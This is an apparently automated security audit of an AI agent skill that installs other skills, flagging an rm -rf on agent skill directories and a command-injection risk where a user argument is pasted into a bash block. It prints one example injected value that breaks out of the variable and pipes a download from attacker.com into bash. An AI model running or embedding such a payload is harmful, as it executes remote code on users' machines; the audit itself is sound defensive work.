install-agent-skills

Warn

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: MEDIUM
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (MEDIUM): The skill is designed to execute a local bash script (scripts/install.sh) that performs potentially destructive filesystem operations.
      • The script uses rm -rf "$TARGET_SKILL" to remove existing directories before installation.
      • It targets sensitive configuration paths for AI agents, such as ~/.claude/skills, ~/.codex/skills, and ~/.config/opencode/skills.
  • [PROMPT_INJECTION] (LOW): The instructions in SKILL.md present an indirect command injection surface by interpolating the user-provided {argument} directly into a bash script block: SKILL="{argument}".
      • Ingestion points: The $ARGUMENTS variable in SKILL.md Step 3.
      • Boundary markers: None present. The argument is placed directly into a variable assignment within a markdown bash block.
      • Capability inventory: The install.sh script can delete directories (rm -rf), create directories (mkdir -p), and create symlinks (ln -s).
      • Sanitization: The bash script uses basename "$SOURCE_SKILL", which provides some mitigation against path traversal for the $TARGET_SKILL variable. However, the initial command construction in the instructions remains vulnerable if the agent executes the block literally with malicious input (e.g., myskill"; curl http://attacker.com | bash; #).
Audit Metadata
Risk Level: MEDIUM
Analyzed: Feb 17, 2026, 06:23 PM